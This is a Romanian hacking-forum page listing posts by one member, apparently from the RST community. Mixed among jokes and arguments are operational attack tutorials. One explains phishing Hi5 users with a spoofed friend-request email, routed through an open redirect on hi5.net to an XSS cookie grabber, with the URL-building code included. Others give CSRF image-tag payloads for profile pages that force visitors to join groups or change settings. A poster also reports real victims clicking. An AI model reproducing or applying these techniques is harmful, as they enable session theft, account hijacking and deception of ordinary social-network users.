Jump to content

loki

Active Members
  • Posts

    3545
  • Joined

  • Last visited

  • Days Won

    19

Everything posted by loki

  1. Deja am avut primele succesuri in interval de 1 ora pe un mail (a dat 2 clickuri ca nu stia de ce nu-i merge friendu). (Ma, tu chiar n-ai auzit de esecurile si succesurile lu Elena Base? ), se pare ca se musca mult mai repede decat la "intra aici, femei goale, etc." Urmeaza sa pregatesc un link la un profil bomba de yahoo cum am scris in alte tutoriale si sa gasesc pe cineva care ma calca pe nervi prin hi5.
  2. Atentie: ACESTE FISIERE SUNT IN SCOP EDUCATIV. NICI EU NICI ECHIPA RSTZONE NU NE ASUMAM RASPUNDEREA UTILIZARII ACESTORA IN ALTE SCOPURI. O metoda foarte buna de a pacali un infocat hi5 spre a-i fura cookie-urile este de a ii trimite un scam hi5 cu link spre grabbere. Aici puteti downloada un formular de email care trimite o astfel de invitatie. Am adaugat in final si o metoda de a trimite linkuri vulnerabile ceva mai credibile folosind http://www.hi5.net in loc de un link direct spre grabber. Download: aici Fisierele incluse: xss.htm - contine un document.location la un xss yahoo mail.html - formularul invitatiei mail.php - codul ce construieste invitatia hi5 Ai nevoie de urmatoarele: - un host care accepta php mail() - un yahoo xss functionabil - un yahoo cookie grabber, foloseste arhiva de pe rstzone.net. (http://www.rstcenter.com/forum/cum-sa-iti-ascunzi-xss-si-yahoo-xss-t8101.rst) 1) Editezi xss.htm in notepad si iti adaugi xss-ul tau Sugestie: adauga in finalul cookie grabberului tau urmatorul cod: <script>document.location="http://www.hi5.com/friend/mail/displayInbox.do"</script> pentru nu lasa userul sa se prinda prea repede ca a fost pacalit. E un redirect final la hi5. 2) Faci upload la fisiere pe hostul tau. 3) Deschizi formularul mail.html si te apuci de scris. Este facut destul de intuitiv dar am sa adaug cateva precizari - campurile notate cu * sunt obligatorii. Atentie, mail.php nu contine validari, le adaugati singuri - Numele si prenumele, scrise frumos cu spatii, va construi subiectul "Mihai Viteazu has sent you a Hi5 friend request". Deasemenea primul cuvant va apare la finalul mailului: "Thanks, Mihai". - *Emailul victimei - atentie la greseli ca nu e validat - Numele victimei asa cum apare el pe hi5. Daca nu vreti sa completati va apare "dear user" - O poza de profil - default e un fund de rata luat tot de pe hi5. Dati properties pe o poza mica de pe hi5 si copiati adresa ei. - Redirect (cookie stealer) scrieti http://siteulmeu.com/xss.htm vezi constructia grabberului mai jos: Odata completate toate campurile, victima va primi pe mail un scam identic hi5 invitation: Acum cateva imbunatatiri: Mailul vine de pe adresa info@hi5.com si daca ai un host bun nu se va duce in bulk. Nu stiu daca ati auzit de hi5.net Este un site plin de adverts cum sunt milioane pe net. Linkul catre XSS este construit folosindu-se de acest site ca sa para mult mai credibil. Am modificat un redirect oarecare de pe site ajungand la linkul de mai jos (inclusiv prostiile lui base64): $grabber="http://siteulmeu.com/xss.htm"; (puteti adauga linia asta ca sa nu o mai scrieti de fiecare data) $grabber='http://www.hi5.net/search/redirect.php? f=http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead %2Ficlk%3Fsa%3Dl%26ai%3DU1VHSSBQVUxBIQ== %26num%3D6%26adurl%3D'.$grabber.'&l=U1VHSSBQVUxBIQ=='; Siteul hi5.net crede ca e o reclama de-a lui si redirecteaza unde dorim noi. Succesuri!
  3. loki

    Site dubios

    oricum codecul e un exe si e un virus. Am dat si eu la plesneala un click spre download si a sarit nod32. E un scam page. Observatie: avea dezactivat click-dreapta, sau in mozila click-dreapta insemna tot download deci intentia e evidenta. Scam.
  4. primul cod postat e prima incercare de a gasi grupuri. Odata ce intri si iesi dintr-un grup te viziteaza baietii. Da nu stiu ce ai facut tu acolo ca in loc de iframe iti vad sursa php
  5. sa analizam gramatical situatia? Nu ma lua cu "in primul rand" in mm ca nu stii nici sa scrii corect gramatical. 1.Cum este posibil sa scrii "revino" legat ? Nu poti emite nici-o scuza atata timp cat ai folosit aceeasi forma de 2 ori. 2.Ce este "ata" ? Nu poti sa scrii atat ? 3.Te invit sa mai consulti dictionarul putin , cel putin cand stai la buda pentru ca nu ti-ar prinde rau.De ce folosesti cuvantul analfabet daca nu stii ce inseamna ? Uite o definitie a cuvantului analfabet : - ANALFABÉT, -Ã, analfabeþi, -te, s.m. ºi f., adj. (Persoanã) care nu ºtie sã scrie ºi sã citeascã; neºtiutor de carte Te asigur eu , daca eram analfabet cu siguranta nu iti mai scriam acum pe forum , in concluzie din postul tau rezulta ca esti un mincinos ! Hai ca esti prost rau ma! REVINO provine de la verbul "a reveni" iar baiatul ala nu a gresit cu nimic cand a scris REVINO legat.Daca nu crezi arunca un ochi in Doom! Si in nici un caz nu se scrie "nici-o".Dupa vechiul Doom se scrie "nici o",iar dupa cel nou se scrie "nicio" asa ca mai traci dreq de prost care se caca in drum.Pun pariu ca esti un copil frustrat care incearca sa mi dea o replica dupa ce citeste post`ul asta.Sa te vad! Scuze de offtopic,dar ma streseaza rau bulangii astia care se cred mari tarfe. credeti-l pe parazitu2009 ca a dat pe la orele legate de doom si stie ce spune...... kuku meu, care din voi e ala de pe hi5 ca nu m-am prins?
  6. ignora, era horny cand a scris !
  7. atunci ai rabdare, e weekend, nimeni nu te poate ajuta mai mult de un weekend fun. Te inteleg ca esti nervos si grabit, dar cu atitudinea ta... nimeni de aici nu e cainele tau!
  8. ce protectie? cat de prost poate sa fie un site sa isi faca protectie la asta? Nu ai inteles ca are efect local? ca si cum ti-ai aseza iconitele pe desktopul tau, nu pe altul.
  9. iti trebe xss pentru fiecare in parte. Depinde de pe ce site vrei sa furi o sesiune, deobicei iei in seama siturile cu login.
  10. daca stau sa compar pozele.... cre ca ajung homo la batranete
  11. ciorapi culoarea pielii... sau e pielea :oops: Ma sa stii ca e romanca dupa batic sau ce e ala din spate, televizor diamant? De unde-i predatoru asta, de pe hi5?
  12. am dat click pe detalii si scrie mare "CLICK HERE to see LIVE DEMO". ( :shock: ) ti-am zis, intrai pe detalii. Le am un pic dar nu le am cu timpul. Intra pe linkurile care le vrei si salveaza pagina (apesi ctrl+s) si iti va salva un folder cu toate pozele si altele din pagina. La flash e mai greu de dezasamblat, azi chiar nu am timp sa-mi arunc privirea prin el. Dar daca vezi ca e strict flash ce vrei dai print screen. Sau zi doar ce poza iti trebuie
  13. Fa exact ce ti-am spus eu. Daca vrei poza unui flash apasa print-screen si paste in paintbrush. Si iti iei poza de acolo. Sau deschizi in decompiler si ai toate resursele din flash, le poti salva pe disc. Zici cumva de asta? http://osc3.template-help.com/stretched_18612/#
  14. un admin poate verifica IP-urile daca apartin vreunui coleg de forum.
  15. loki

    Bancuri bune :P

    Un Maybach se ciocneste frontal cu un tico. Pe computerul de bord al Maybach-ului apare "New Hardware Found! Install?"
  16. coincidenta: vaslui, de aia ziceam din surse 90% sigure ca filmarea nu e din vaslui si eu Pai atunci dau o bere cand vii din Spania!
  17. Loooalleeee!!! Cum sa ai j-de mii de vizitatori (cu oleaca de rabdare): scrieti un .php si ii dati refresh cat vreti sau inlocuiti 20 cu ceva mai mare. Nu uitati sa fiti logati in Hi5. Ajustati numerele, programul te inscrie la 20 grupuri random. Chiar ca ma kk pe captcha de la hi5. Acum depinde de noroc sa va gaseasca random-ul ceva in intervalul de mai sus (mi-a gasit 2) dar bagati mai mult de 20 si dati refresh. Asa ca nu imi spuneti ca nu merge, grupurile sunt cam rare si greu de gasit. Daca nu exista grupul va apare in iframe mesajul cu oops! Odata inscris toti membrii grupurilor vor fi curiosi si vor intra pe profil la voi. PS am inscris 4 grupuri si le-am sters. Deja am 2 Owned! in Ratati group EDIT: Revin cu un crawler php de cautat "manele" sau ce vreti voi. Am dibuit search-ul. Ca metoda de revers: puneti mai tarziu un link "click here" spre crawler si il inscrieti pe vizitator la toate gunoaiele de grupuri de pe Hi5.
  18. Una frumoasa: Cum sa-ti faci un grup de ratati: Creati un grup nou (eu am creat "ratati") in care scrieti tot ce aveti pe suflet (de ex Grup pentru toti care le plac sa o ia in gura in timp ce fac karaoke cu OOO viatamea, aveti imaginatie). Nu il setati ca Adult ca devine privat (nu am incercat, poate merge totusi) Intrati apoi pe groups sa vedeti cum il cheama, va apare cu un link gen http://www.hi5.com/friend/group/3038263--ewq--front-html copiati numarul 3038263 Intra aici: Cod: http://hi5.com/friend/profile/editBasic.do La "About Me" scrieti urmatorul cod: [img=http://www.hi5.com/friend/group/joinGroup.do?accessCode=&invitorId=&contactId=&friendId=&groupId=3038263] height=0> inlocuiti 3038263 cu grupul vostru Toti vizitatorii vor intra direct in grupul creat de voi, desi un join group are protectie captcha :shock: EDIT: Nemesis, daca updatezi, am mai adaugat eu una pe la inceputul threadului, am rescris-o mai citet: Intra aici: Cod: http://hi5.com/friend/profile/editBasic.do La "About Me" scrieti urmatorul cod: [img=http://www.hi5.com/friend/displayHomePage.do?lang=uk_UA] Paginile pe care le va deschide userul vor fi afisate in chirilica (setari de ukraina). Alegeti o limba din lista de la punctul 3. In plus, desi userul isi schimba limba la loc, ii raman cateva setari pe tara respectiva. -------------------- Eu nu am testat, dar dupa cum vezi faza cu chapta in multe locuri nu iti cere confirmare. Accesscode este gol in link dar ignora.
  19. Dai in detalii apesi ctrl+s si salvezi pagina. iti instalezi un decompiler care are deobicei si optiunea sa-ti downloadeze flashurile. Daca nu, le gasesti in temporare. Dar la cat te chinui sa ti le personalizezi, daca omu le vinde, fii cinstit si cumpara sau lasa-l. Nu cere mai mult ca n-o sa sparga nimeni situl pentru furat templateuri.
  20. loki

    "hacerii..."

    ce dreaq numai la mine da page not found? parca stiam ca la expirare imi cerea login... la ora asta nu vad daca are ceva linku si nici nu ma consum pentru un ratat da-s curios: si-a sters si contu yahoo sau numai mie mi se intampla?
  21. coincidenta: vaslui, de aia ziceam din surse 90% sigure ca filmarea nu e din vaslui
  22. am ramas doar pe 2 mai subtile: - profil vazut de toti! - status=owned! Si cont de fata ca sa am "succesuri". PS ma tot viziteaza uratu ala de la vladinho, de unde draq imi gaseste toate conturile de fete pe care le deschid... pe toate imi da friend, am cosmare de la photo de chibrit cu privire de jbond
  23. Bate palma! (nu zic have five si eu) Adevarul e ca dupa postul meu in incercarea de a opri o posibila discutie offtopic pro si contra moldovenilor.... m-am gandit ca o intorc impotriva ungurilor. PS N-am nimk cu ungurii, decat cu ungurii de la Borsec care ma tratau ca pe un cersetor daca ceream la magazin in romaneste. @ontopic... am uitat
  24. tau doar putin? :arrow: Oare ce consecinte ar fi daca te-ar injura un jucator de cq? :roll:aia nu jtie sa injure, au facut armata la CQ, ii bana moderatorii de acolo
  25. unii oameni is prosti... chiar ajungem la polemici intre moldoveni olteni bucuresteni ... mai bine ramanem la unguri
×
×
  • Create New...